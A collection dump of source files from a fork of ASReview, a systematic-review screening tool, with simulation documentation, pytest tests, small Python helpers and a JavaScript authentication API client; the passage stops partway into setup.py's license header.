bash\n\n\tasreview simulate MY_DATASET.csv -s MY_SIMULATION.asreview\n\nThis performs a simulation with the default active learning model, where\n``MY_DATASET.csv`` is the path to the :ref:`data_labeled:Fully labeled data`\nyou want to simulate. After a successful simulation, the result is stored at\n``MY_SIMULATION.asreview``, where ``MY_SIMULATION`` is the filename you prefer\nand the extension is ``.asreview`` (the ASReview project file extension).\n\nSimulation progress\n-------------------\n\nThe progress of the simulation is shown with two progress bars. The top one is\nused to count the number of relevant records found. 
The bottom one monitors\nthe number of records labeled. By default (with ``--stop_if min``), the\nsimulation stops once the top progress bar reaches 100%.\n\n.. code-block:: bash\n\n Simulation started\n\n Relevant records found: 100%|███████████████████████████████████████████████| 43/43 [00:03<00:00, 13.42it/s]\n Records labeled : 7%|██▉ | 420/6189 [00:03<00:43, 133.58it/s]\n\n Simulation finished\n\nCommand line arguments for simulating\n-------------------------------------\n\nThe command ``asreview simulate --help`` provides an overview of available\narguments for the simulation.\n\nEach of the sections below describes the available arguments. The example below\nshows how you can set the command line arguments. This can be helpful if you\nare new to using the command line. Suppose, for example, that you want to\nchange the query strategy being used. The command line and this documentation\nshow ``-q, --query_strategy QUERY_STRATEGY``. The default is ``max``. If you\nwant to change it to ``max_random``, you use:\n\n.. code-block:: bash\n\n asreview simulate MY_DATASET.csv -s MY_SIMULATION.asreview -q max_random\n\n\nDataset\n~~~~~~~\n\n.. option:: dataset\n\n Required. File path or URL to the dataset or one of the benchmark datasets.\n\nYou can also use one of the :ref:`benchmark-datasets <data_labeled:fully\nlabeled data>` (see `index.csv\n<https://github.com/asreview/systematic-review-datasets/blob/master/index.csv>`_\nfor dataset IDs). Use the following command and replace ``DATASET_ID`` by the\ndataset ID.\n\n.. code:: bash\n\n asreview simulate benchmark:DATASET_ID\n\nFor example:\n\n.. code:: bash\n\n asreview simulate benchmark:van_de_Schoot_2017 -s myreview.asreview\n\n\nActive learning\n~~~~~~~~~~~~~~~\n\n.. option:: -e, --feature_extraction FEATURE_EXTRACTION\n\n The default is TF-IDF (:code:`tfidf`). More options and details are listed\n in :ref:`ref-feature-extraction`.\n\n.. option:: -m, --model MODEL\n\n The default is Naive Bayes (:code:`nb`). More options and details are listed\n in :ref:`ref-classifiers`.\n\n.. option:: -q, --query_strategy QUERY_STRATEGY\n\n The default is Maximum (:code:`max`). More options and details are listed\n in :ref:`ref-query-strategies`.\n\n.. option:: -b, --balance_strategy BALANCE_STRATEGY\n\n The default is :code:`double`. The balancing strategy is used to deal with\n the sparsity of relevant records. More options and details are listed\n in :ref:`ref-balance-strategies`.\n\n.. option:: --seed SEED\n\n To make your simulations reproducible you can use the ``--seed`` and\n ``--init_seed`` options. 'init_seed' controls the starting set of papers\n to train the model on, while 'seed' controls the seed of the random\n number generation that is used after initialization.\n\n.. option:: --embedding EMBEDDING_FP\n\n File path of embedding matrix. Required for LSTM models.\n\n\nPrior knowledge\n~~~~~~~~~~~~~~~\n\nBy default, the model initializes with one relevant and one irrelevant record.\nYou can set the number of priors by ``--n_prior_included`` and\n``--n_prior_excluded``. However, if you want to initialize your model with a\nspecific set of starting papers, you can use ``--prior_idx`` to select the\nindices of the papers you want to start the simulation with.\n\n.. option:: --n_prior_included N_PRIOR_INCLUDED\n\n The number of prior included papers. Only used when :code:`prior_idx` is\n not given. Default 1.\n\n.. option:: --n_prior_excluded N_PRIOR_EXCLUDED\n\n The number of prior excluded papers. 
Only used when :code:`prior_idx` is\n not given. Default 1.\n\n\n.. option:: --prior_idx [PRIOR_IDX [PRIOR_IDX ...]]\n\n Prior indices by row number (row numbers start at 0).\n\n\n.. option:: --init_seed INIT_SEED\n\n Seed for setting the prior indices if the prior_idx option is not used. If\n the option prior_idx is used with one or more indices, this option is\n ignored.\n\n\n\nSimulation setup\n~~~~~~~~~~~~~~~~\n\n.. option:: --n_instances N_INSTANCES\n\n Controls the number of records to be labeled before the model is\n retrained. Increase ``n_instances``, for example, to reduce the time it\n takes to simulate. Default 1.\n\n.. option:: --stop_if STOP_IF\n\n The number of label actions to simulate. The default, 'min', stops\n simulating when all relevant records are found. Use -1 to simulate all\n label actions.\n\n\nSave\n~~~~\n\n\n.. option:: --state_file STATE_FILE, -s STATE_FILE\n\n Location of the ASReview project file for the simulation.\n\n\nAlgorithms\n----------\n\nThe command line interface provides an easy way to get an overview of all\navailable active learning model elements (classifiers, query strategies,\nbalance strategies, and feature extraction algorithms) and their names for\ncommand line usage in ASReview LAB. It also includes models added\nvia :doc:`extensions_overview`. The following command lists\nthe available models:\n\n.. code:: bash\n\n asreview algorithms\n\nSee :ref:`develop-extensions` for more information on developing new models\nand installing them via extensions.\n\nSome models require additional dependencies to be installed. Use\n:code:`pip install asreview[all]` to install all additional dependencies\nat once or check the installation instructions in section :ref:`ref-models`\nof the :doc:`reference`.\n" }, { "alpha_fraction": 0.6696551442146301, "alphanum_fraction": 0.677931010723114, "avg_line_length": 30.521739959716797, "blob_id": "bfaae6f085bf23fcfe5d3f4f281d404a285c8338", "content_id": "d1af1717149ca90cdaebb55f13fd2edfbe942746", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1450, "license_type": "permissive", "max_line_length": 88, "num_lines": 46, "path": "/asreview/_deprecated.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2023 The ASReview Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport argparse\nimport functools\nimport logging\nimport warnings\n\n\ndef _deprecated_func(msg):\n def dec(func):\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n warnings.warn(msg)\n return func(*args, **kwargs)\n\n return wrapper\n\n return dec\n\n\nclass DeprecateAction(argparse.Action):\n def __call__(self, parser, namespace, values, option_string=None):\n logging.warning(f\"Argument {self.option_strings} is deprecated and is ignored.\")\n delattr(namespace, self.dest)\n\n\ndef mark_deprecated_help_strings(parser, prefix=\"DEPRECATED\"):\n for action in parser._actions:\n if isinstance(action, DeprecateAction):\n h = action.help\n if h is None:\n action.help = prefix\n else:\n action.help = prefix + \": \" + h\n" }, { "alpha_fraction": 0.714029848575592, "alphanum_fraction": 0.7301492691040039, "avg_line_length": 32.843137741088867, "blob_id": "dbe409ed7d98b8adf30cfef5eb217904f8c76ce1", "content_id": "89ed8c8b4685b8e71ad03ecb29b048491215dc57", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1675, "license_type": "permissive", "max_line_length": 106, "num_lines": 51, "path": "/docs/source/manage.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "Manage projects\n===============\n\nASReview LAB offers options to import and export projects. This can be\nuseful for sharing results, archiving projects, and making backups.\n\n\n.. figure:: ../images/dashboard_project_options.png\n :alt: ASReview LAB Projects dashboard showing options\n\nImport Project\n--------------\n\nTo import a project:\n\n1. :doc:`start`.\n2. Go to the *Projects dashboard* (http://localhost:5000/projects).\n3. Click on the *Import project* icon on the top right.\n4. Click on *Select file* and select a project from your device (with the ``.asreview`` extension).\n5. Open the project from the *Projects dashboard*.\n\nExport Project\n--------------\n\nThe ASReview project file (extension ``.asreview``) can be exported from\nASReview LAB. The file contains the dataset, review history, notes, and model\nconfiguration. It can be imported into ASReview LAB on a different device,\nwhich allows other users to replicate the project or continue the systematic\nreview.\n\nTo export your project:\n\n1. :doc:`start`.\n2. Go to the *Projects dashboard* (http://localhost:5000/projects).\n3. Hover over the project you want to export and click on the *Export* icon.\n4. Click on *Select file* and click on *Project*.\n5. Click on *Export*.\n\nYou will be asked where to save the ASReview file (extension ``.asreview``).\n\n\nDelete Project\n--------------\n\nTo permanently delete a project, including ALL files:\n\n1. :doc:`start`.\n2. Go to the *Projects dashboard* (http://localhost:5000/projects).\n3. Hover over the project you want to delete and click on *Options*.\n4. Click on *Delete forever*.\n5. 
This action cannot be undone; ASReview LAB will ask you to confirm by typing in the project title.\n" }, { "alpha_fraction": 0.6532823443412781, "alphanum_fraction": 0.6583811640739441, "avg_line_length": 25.721311569213867, "blob_id": "e6a91ba5f0451142addfdb3ec5c80625ba5c4bd6", "content_id": "785efcaf71093b390f9b3a423a2dcb453bf93ab0", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1569, "license_type": "permissive", "max_line_length": 85, "num_lines": 61, "path": "/tests/test_feature.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import os\n\nimport pytest\n\nfrom asreview import ASReviewData\nfrom asreview.models.feature_extraction import get_feature_model\nfrom asreview.models.feature_extraction import list_feature_extraction\n\nADVANCED_DEPS = {\"tensorflow\": False}\n\nREQUIRES_EXTRA_DEPS = [\"doc2vec\", \"embedding-idf\", \"sbert\"]\n\ntry:\n import tensorflow # noqa\n\n ADVANCED_DEPS[\"tensorflow\"] = True\nexcept ImportError:\n pass\n\n\[email protected](\n \"feature_extraction\",\n [\n \"doc2vec\",\n \"embedding-idf\",\n # \"sbert\",\n \"tfidf\",\n ],\n)\[email protected](\n \"split_ta\",\n [\n 0,\n 1,\n ],\n)\ndef test_features(feature_extraction, split_ta):\n if feature_extraction in REQUIRES_EXTRA_DEPS and not ADVANCED_DEPS[\"tensorflow\"]:\n pytest.skip()\n\n embedding_fp = os.path.join(\"tests\", \"demo_data\", \"generic.vec\")\n data_fp = os.path.join(\"tests\", \"demo_data\", \"generic.csv\")\n\n as_data = ASReviewData.from_file(data_fp)\n texts = as_data.texts\n if feature_extraction.startswith(\"embedding-\"):\n model = get_feature_model(\n feature_extraction, split_ta=split_ta, embedding_fp=embedding_fp\n )\n else:\n model = get_feature_model(feature_extraction, split_ta=split_ta)\n X = model.fit_transform(texts, titles=as_data.title, abstracts=as_data.abstract)\n\n assert X.shape[0] == len(as_data.title)\n assert X.shape[1] > 0\n assert isinstance(model.param, dict)\n assert model.name == feature_extraction\n\n\ndef test_feature_general():\n assert len(list_feature_extraction()) >= 5\n" }, { "alpha_fraction": 0.6118633151054382, "alphanum_fraction": 0.6317583322525024, "avg_line_length": 30.46956443786621, "blob_id": "af803c30b4cffc97a34a36b2f51a975cc3b0328a", "content_id": "4af3332c66f557f90a0cfdce2f23c802a3352142", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10857, "license_type": "permissive", "max_line_length": 117, "num_lines": 345, "path": "/tests/test_simulate.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import json\nfrom pathlib import Path\n\nimport pytest\n\nfrom asreview.entry_points.simulate import SimulateEntryPoint\nfrom asreview.entry_points.simulate import _get_dataset_path_from_args\nfrom asreview.entry_points.simulate import _simulate_parser\nfrom asreview.project import ASReviewProject\nfrom asreview.project import ProjectExistsError\nfrom asreview.project import open_state\n\nADVANCED_DEPS = {\"tensorflow\": False}\n\ntry:\n import tensorflow # noqa\n\n ADVANCED_DEPS[\"tensorflow\"] = True\nexcept ImportError:\n pass\n\n\nDATA_FP = Path(\"tests\", \"demo_data\", \"generic_labels.csv\")\nDATA_FP_URL = \"https://raw.githubusercontent.com/asreview/asreview/master/tests/demo_data/generic_labels.csv\" # noqa\nDATA_FP_NO_ABS = Path(\"tests\", \"demo_data\", \"generic_labels_no_abs.csv\")\nDATA_FP_NO_TITLE = Path(\"tests\", \"demo_data\", 
\"generic_labels_no_title.csv\")\nEMBEDDING_FP = Path(\"tests\", \"demo_data\", \"generic.vec\")\nCFG_DIR = Path(\"tests\", \"cfg_files\")\nSTATE_DIR = Path(\"tests\", \"state_files\")\nH5_STATE_FILE = Path(STATE_DIR, \"test.h5\")\nJSON_STATE_FILE = Path(STATE_DIR, \"test.json\")\n\n\[email protected](\n raises=FileNotFoundError,\n reason=\"File, URL, or dataset does not exist: \" \"'this_doesnt_exist.csv'\",\n)\ndef test_dataset_not_found(tmpdir):\n entry_point = SimulateEntryPoint()\n asreview_fp = Path(tmpdir, \"project.asreview\")\n argv = f\"does_not.exist -s {asreview_fp}\".split()\n entry_point.execute(argv)\n\n\ndef test_simulate_review_finished(tmpdir):\n # file path\n asreview_fp = Path(tmpdir, \"test.asreview\")\n\n # simulate entry point\n entry_point = SimulateEntryPoint()\n entry_point.execute(f\"{DATA_FP} -s {asreview_fp}\".split())\n\n Path(tmpdir, \"test\").mkdir(parents=True)\n project = ASReviewProject.load(asreview_fp, Path(tmpdir, \"test\"))\n\n assert project.config[\"reviews\"][0][\"status\"] == \"finished\"\n\n\ndef test_prior_idx(tmpdir):\n asreview_fp = Path(tmpdir, \"test.asreview\")\n argv = f\"{str(DATA_FP)} -s {asreview_fp} --prior_idx 1 4\".split()\n entry_point = SimulateEntryPoint()\n entry_point.execute(argv)\n\n with open_state(asreview_fp) as state:\n labeling_order = state.get_order_of_labeling()\n query_strategies = state.get_query_strategies()\n\n assert labeling_order[0] == 1\n assert labeling_order[1] == 4\n assert all(query_strategies[:1] == \"prior\")\n assert all(query_strategies[2:] != \"prior\")\n\n\ndef test_n_prior_included(tmpdir):\n asreview_fp = Path(tmpdir, \"test.asreview\")\n argv = f\"{str(DATA_FP)} -s {asreview_fp} --n_prior_included 2\".split()\n entry_point = SimulateEntryPoint()\n entry_point.execute(argv)\n\n with open_state(asreview_fp) as state:\n result = state.get_dataset([\"label\", \"query_strategy\"])\n\n prior_included = result[\"label\"] & (result[\"query_strategy\"] == \"prior\")\n assert sum(prior_included) == 2\n\n Path(tmpdir, \"test\").mkdir(parents=True)\n project = ASReviewProject.load(asreview_fp, Path(tmpdir, \"test\"))\n\n settings_path = Path(\n project.project_path,\n \"reviews\",\n project.config[\"reviews\"][0][\"id\"],\n \"settings_metadata.json\",\n )\n with open(settings_path, \"r\") as f:\n settings_metadata = json.load(f)\n\n assert settings_metadata[\"settings\"][\"n_prior_included\"] == 2\n\n\ndef test_n_prior_excluded(tmpdir):\n asreview_fp = Path(tmpdir, \"test.asreview\")\n argv = f\"{str(DATA_FP)} -s {asreview_fp} --n_prior_excluded 2\".split()\n entry_point = SimulateEntryPoint()\n entry_point.execute(argv)\n\n with open_state(asreview_fp) as state:\n result = state.get_dataset([\"label\", \"query_strategy\"])\n\n prior_excluded = ~result[\"label\"] & (result[\"query_strategy\"] == \"prior\")\n assert sum(prior_excluded) == 2\n\n Path(tmpdir, \"test\").mkdir(parents=True)\n project = ASReviewProject.load(asreview_fp, Path(tmpdir, \"test\"))\n\n settings_path = Path(\n project.project_path,\n \"reviews\",\n project.config[\"reviews\"][0][\"id\"],\n \"settings_metadata.json\",\n )\n with open(settings_path, \"r\") as f:\n settings_metadata = json.load(f)\n\n assert settings_metadata[\"settings\"][\"n_prior_excluded\"] == 2\n\n\n# TODO: Add random seed to settings.\n# def test_seed(tmpdir):\n# asreview_fp = Path(tmpdir, 'test.asreview')\n# argv = f'{str(DATA_FP)} -s {asreview_fp} --seed 42'.split()\n# entry_point = SimulateEntryPoint()\n# entry_point.execute(argv)\n#\n# with 
open(get_settings_metadata_path(asreview_fp), 'r') as f:\n# settings_metadata = json.load(f)\n#\n# assert settings_metadata['random_seed'] == 42\n\n\ndef test_non_tf_models(tmpdir):\n models = [\"logistic\", \"nb\", \"rf\", \"svm\"]\n for model in models:\n print(model)\n asreview_fp = Path(tmpdir, f\"test_{model}.asreview\")\n argv = f\"{str(DATA_FP)} -s {asreview_fp} -m {model}\".split()\n entry_point = SimulateEntryPoint()\n entry_point.execute(argv)\n\n with open_state(asreview_fp) as state:\n classifiers = state.get_classifiers()\n default_n_priors = 2\n assert all(classifiers[default_n_priors:] == model)\n\n Path(tmpdir, f\"test_{model}\").mkdir(parents=True)\n project = ASReviewProject.load(asreview_fp, Path(tmpdir, f\"test_{model}\"))\n\n settings_path = Path(\n project.project_path,\n \"reviews\",\n project.config[\"reviews\"][0][\"id\"],\n \"settings_metadata.json\",\n )\n with open(settings_path, \"r\") as f:\n settings_metadata = json.load(f)\n\n assert settings_metadata[\"settings\"][\"model\"] == model\n\n\ndef test_number_records_found(tmpdir):\n dataset = \"synergy:van_de_Schoot_2018\"\n asreview_fp = Path(tmpdir, \"test.asreview\")\n stop_if = 100\n priors = [116, 285]\n seed = 101\n\n argv = (\n f\"{dataset} -s {asreview_fp} --stop_if {stop_if} \"\n f\"--prior_idx {priors[0]} {priors[1]} --seed {seed}\".split()\n )\n entry_point = SimulateEntryPoint()\n entry_point.execute(argv)\n\n with open_state(asreview_fp) as s:\n assert s.get_labels().sum() == 29\n\n\ndef test_stop_if_min(tmpdir):\n dataset = \"synergy:van_de_Schoot_2018\"\n asreview_fp = Path(tmpdir, \"test.asreview\")\n stop_if = \"min\"\n priors = [116, 285]\n seed = 101\n\n argv = (\n f\"{dataset} -s {asreview_fp} --stop_if {stop_if} \"\n f\"--prior_idx {priors[0]} {priors[1]} --seed {seed}\".split()\n )\n entry_point = SimulateEntryPoint()\n entry_point.execute(argv)\n\n with open_state(asreview_fp) as s:\n assert s.get_labels().sum() == 38\n assert len(s.get_labels()) == 630\n\n\ndef test_stop_if_all(tmpdir):\n dataset = \"synergy:van_de_Schoot_2018\"\n asreview_fp = Path(tmpdir, \"test.asreview\")\n stop_if = -1\n priors = [116, 285]\n seed = 101\n\n argv = (\n f\"{dataset} -s {asreview_fp} --stop_if {stop_if} \"\n f\"--prior_idx {priors[0]} {priors[1]} --seed {seed}\".split()\n )\n entry_point = SimulateEntryPoint()\n entry_point.execute(argv)\n\n with open_state(asreview_fp) as s:\n assert s.get_labels().sum() == 38\n assert len(s.get_labels()) == 4544\n\n\ndef test_write_interval(tmpdir):\n dataset = \"synergy:van_de_Schoot_2018\"\n asreview_fp = Path(tmpdir, \"test.asreview\")\n stop_if = 100\n priors = [116, 285]\n seed = 101\n write_interval = 20\n\n argv = (\n f\"{dataset} -s {asreview_fp} --stop_if {stop_if} \"\n f\"--prior_idx {priors[0]} {priors[1]} --seed {seed} \"\n f\"--write_interval {write_interval}\".split()\n )\n entry_point = SimulateEntryPoint()\n entry_point.execute(argv)\n\n with open_state(asreview_fp) as s:\n assert s.get_labels().sum() == 29\n\n\[email protected](raises=ProjectExistsError, reason=\"Cannot continue simulation.\")\ndef test_project_already_exists_error(tmpdir):\n asreview_fp1 = Path(tmpdir, \"test1.asreview\")\n\n argv = (\n f\"synergy:van_de_Schoot_2018 -s {asreview_fp1} --stop_if 100\"\n f\" --seed 535\".split()\n )\n entry_point = SimulateEntryPoint()\n entry_point.execute(argv)\n\n # Simulate 100 queries in two steps of 50.\n argv = (\n f\"synergy:van_de_Schoot_2018 -s {asreview_fp1} --stop_if 50\"\n f\" --seed 535\".split()\n )\n entry_point = SimulateEntryPoint()\n 
entry_point.execute(argv)\n\n\[email protected](reason=\"Partial simulations are not available.\")\ndef test_partial_simulation(tmpdir):\n dataset = \"synergy:van_de_Schoot_2018\"\n asreview_fp1 = Path(tmpdir, \"test1.asreview\")\n asreview_fp2 = Path(tmpdir, \"test2.asreview\")\n\n priors = [284, 285]\n seed = 101\n\n # Simulate 100 queries in one go.\n argv = (\n f\"{dataset} -s {asreview_fp1} --stop_if 100 \"\n f\"--prior_idx {priors[0]} {priors[1]} --seed {seed}\".split()\n )\n entry_point = SimulateEntryPoint()\n entry_point.execute(argv)\n\n # Simulate 100 queries in two steps of 50.\n argv = (\n f\"{dataset} -s {asreview_fp2} --stop_if 50 \"\n f\"--prior_idx {priors[0]} {priors[1]} --seed {seed}\".split()\n )\n entry_point = SimulateEntryPoint()\n entry_point.execute(argv)\n\n argv = (\n f\"{dataset} -s {asreview_fp2} --stop_if 100 \"\n f\"--prior_idx {priors[0]} {priors[1]} --seed {seed}\".split()\n )\n entry_point = SimulateEntryPoint()\n entry_point.execute(argv)\n\n with open_state(asreview_fp1) as state:\n dataset1 = state.get_dataset()\n\n with open_state(asreview_fp2) as state:\n dataset2 = state.get_dataset()\n\n assert dataset1.shape == dataset2.shape\n # All query strategies should match.\n assert dataset1[\"query_strategy\"].to_list() == dataset2[\"query_strategy\"].to_list()\n # The first 50 record ids and labels should match.\n assert (\n dataset1[\"record_id\"].iloc[:50].to_list()\n == dataset2[\"record_id\"].iloc[:50].to_list()\n )\n assert (\n dataset1[\"label\"].iloc[:50].to_list() == dataset2[\"label\"].iloc[:50].to_list()\n )\n\n # You expect many of the same records in the second 50 records.\n # With this initial seed there are 89 in total.\n assert (\n len(dataset1[\"record_id\"][dataset1[\"record_id\"].isin(dataset2[\"record_id\"])])\n == 89\n )\n\n\[email protected](reason=\"Partial simulations are not available.\")\ndef test_is_partial_simulation(tmpdir):\n dataset = \"synergy:van_de_Schoot_2018\"\n asreview_fp = Path(tmpdir, \"test.asreview\")\n\n argv = f\"{dataset} -s {asreview_fp} --stop_if 50\".split()\n parser = _simulate_parser()\n args = parser.parse_args(argv)\n\n assert not _is_partial_simulation(args) # noqa\n\n entry_point = SimulateEntryPoint()\n entry_point.execute(argv)\n\n assert _is_partial_simulation(args) # noqa\n\n\ndef test_get_dataset_path_from_args():\n assert _get_dataset_path_from_args(\"test\") == \"test.csv\"\n assert _get_dataset_path_from_args(\"test.ris\") == \"test.csv\"\n assert _get_dataset_path_from_args(\"benchmark:test\") == \"test.csv\"\n" }, { "alpha_fraction": 0.6859169006347656, "alphanum_fraction": 0.698074996471405, "avg_line_length": 34.25, "blob_id": "6e9b9f3033135833c427d352bdaac8feffc37608", "content_id": "f585c270d8808f4b0048c282c5b46c16c5f2c151", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 987, "license_type": "permissive", "max_line_length": 79, "num_lines": 28, "path": "/asreview/compat.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\ndef convert_id_to_idx(data_obj, record_id):\n \"\"\"Convert record_id to row number.\"\"\"\n\n inv_record_id = dict(zip(data_obj.df.index.tolist(), range(len(data_obj))))\n\n result = []\n for i in record_id:\n try:\n result.append(inv_record_id[i])\n except KeyError:\n raise KeyError(f\"record_id {i} not found in data.\")\n\n return result\n" }, { "alpha_fraction": 0.5211904048919678, "alphanum_fraction": 0.5219438672065735, "avg_line_length": 24.161136627197266, "blob_id": "849916485af78a4f6baa504dd3fbf957a99621c1", "content_id": "10ae8c28cc820e3455f38ae950082df816c83385", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 5309, "license_type": "permissive", "max_line_length": 74, "num_lines": 211, "path": "/asreview/webapp/src/api/AuthAPI.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import { axiosErrorHandler } from \"./axiosErrorHandler\";\nimport { auth_url } from \"../globals.js\";\nimport axios from \"axios\";\n\nclass AuthAPI {\n static signup(variables) {\n let body = new FormData();\n body.set(\"password\", variables.password);\n body.set(\"name\", variables.name);\n body.set(\"affiliation\", variables.affiliation);\n body.set(\"email\", variables.email);\n body.set(\"public\", variables.publicAccount === true ? 
1 : 0);\n\n const url = auth_url + `signup`;\n return new Promise((resolve, reject) => {\n axios({\n method: \"post\",\n url: url,\n data: body,\n })\n .then((result) => {\n resolve(result[\"data\"]);\n })\n .catch((error) => {\n reject(axiosErrorHandler(error));\n });\n });\n }\n\n static signin(variables) {\n let body = new FormData();\n body.set(\"email\", variables.email);\n body.set(\"password\", variables.password);\n\n const url = auth_url + `signin`;\n return new Promise((resolve, reject) => {\n axios({\n method: \"post\",\n url: url,\n data: body,\n // This is essential, allows cookies to be created through Headers\n withCredentials: true,\n })\n .then((result) => {\n resolve(result[\"data\"]);\n })\n .catch((error) => {\n reject(axiosErrorHandler(error));\n });\n });\n }\n\n static forgotPassword(variables) {\n let body = new FormData();\n body.set(\"email\", variables.email);\n\n const url = auth_url + `forgot_password`;\n return new Promise((resolve, reject) => {\n axios({\n method: \"post\",\n url: url,\n data: body,\n })\n .then((result) => {\n resolve(result[\"data\"]);\n })\n .catch((error) => {\n reject(axiosErrorHandler(error));\n });\n });\n }\n\n static confirmAccount(variables) {\n let body = new FormData();\n body.set(\"user_id\", variables.userId);\n body.set(\"token\", variables.token);\n\n const url = auth_url + `confirm_account`;\n return new Promise((resolve, reject) => {\n axios({\n method: \"post\",\n url: url,\n data: body,\n })\n .then((result) => {\n resolve(result[\"data\"]);\n })\n .catch((error) => {\n reject(axiosErrorHandler(error));\n });\n });\n }\n\n static refresh() {\n const url = auth_url + `refresh`;\n return new Promise((resolve, reject) => {\n axios\n .get(url, { withCredentials: true })\n .then((result) => {\n resolve(result[\"data\"]);\n })\n .catch((error) => {\n reject(axiosErrorHandler(error));\n });\n });\n }\n\n static signout(variables) {\n const url = auth_url + `signout`;\n return new Promise((resolve, reject) => {\n axios({\n method: \"delete\",\n url: url,\n withCredentials: true,\n })\n .then((result) => {\n resolve(result[\"data\"]);\n })\n .catch((error) => {\n reject(axiosErrorHandler(error));\n });\n });\n }\n\n static getProfile() {\n const url = auth_url + `get_profile`;\n return new Promise((resolve, reject) => {\n axios\n .get(url, { withCredentials: true })\n .then((result) => {\n resolve(result[\"data\"]);\n })\n .catch((error) => {\n reject(axiosErrorHandler(error));\n });\n });\n }\n\n static updateProfile(variables) {\n let body = new FormData();\n body.set(\"password\", variables.password);\n body.set(\"name\", variables.name);\n body.set(\"affiliation\", variables.affiliation);\n body.set(\"email\", variables.email);\n body.set(\"public\", variables.publicAccount === true ? 
1 : 0);\n\n const url = auth_url + `update_profile`;\n return new Promise((resolve, reject) => {\n axios({\n method: \"post\",\n url: url,\n data: body,\n withCredentials: true,\n })\n .then((result) => {\n resolve(result[\"data\"]);\n })\n .catch((error) => {\n reject(axiosErrorHandler(error));\n });\n });\n }\n\n static resetPassword(variables) {\n let body = new FormData();\n body.set(\"password\", variables.password);\n body.set(\"token\", variables.token);\n body.set(\"user_id\", variables.userId);\n\n const url = auth_url + `reset_password`;\n return new Promise((resolve, reject) => {\n axios({\n method: \"post\",\n url: url,\n data: body,\n })\n .then((result) => {\n console.log(result);\n resolve(result[\"data\"]);\n })\n .catch((error) => {\n reject(axiosErrorHandler(error));\n });\n });\n }\n\n static oAuthCallback(data) {\n let body = new FormData();\n body.set(\"code\", data.code);\n body.set(\"provider\", data.provider);\n body.set(\"redirect_uri\", data.redirect_uri);\n const url = auth_url + `oauth_callback`;\n return new Promise((resolve, reject) => {\n axios({\n method: \"post\",\n url: url,\n data: body,\n // This is essential, allows cookies to be created through Headers\n withCredentials: true,\n })\n .then((result) => {\n resolve(result[\"data\"]);\n })\n .catch((error) => {\n reject(axiosErrorHandler(error));\n });\n });\n }\n}\n\nexport default AuthAPI;\n" }, { "alpha_fraction": 0.7880485653877258, "alphanum_fraction": 0.7992530465126038, "avg_line_length": 41.84000015258789, "blob_id": "ec4511c3520575a8dbc322cd1a561ea13c4b211a", "content_id": "ee6089ed48b4d101a2afe867ab95a59da222d42b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1071, "license_type": "permissive", "max_line_length": 74, "num_lines": 25, "path": "/asreview/io/__init__.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nfrom asreview.io.csv_reader import CSVReader\nfrom asreview.io.csv_writer import CSVWriter\nfrom asreview.io.excel_reader import ExcelReader\nfrom asreview.io.excel_writer import ExcelWriter\nfrom asreview.io.paper_record import PaperRecord\nfrom asreview.io.ris_reader import RISReader\nfrom asreview.io.ris_writer import RISWriter\nfrom asreview.io.tsv_writer import TSVWriter\nfrom asreview.io.utils import list_readers\nfrom asreview.io.utils import list_writers\n" }, { "alpha_fraction": 0.6128746867179871, "alphanum_fraction": 0.6203364133834839, "avg_line_length": 33.37826156616211, "blob_id": "49e6b8dbfa8427b4567b4c4e75484ba4d17cceb2", "content_id": "a9e34ab31942e355923a411fd0cedb04e629704f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7907, "license_type": "permissive", "max_line_length": 87, "num_lines": 230, "path": "/setup.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# 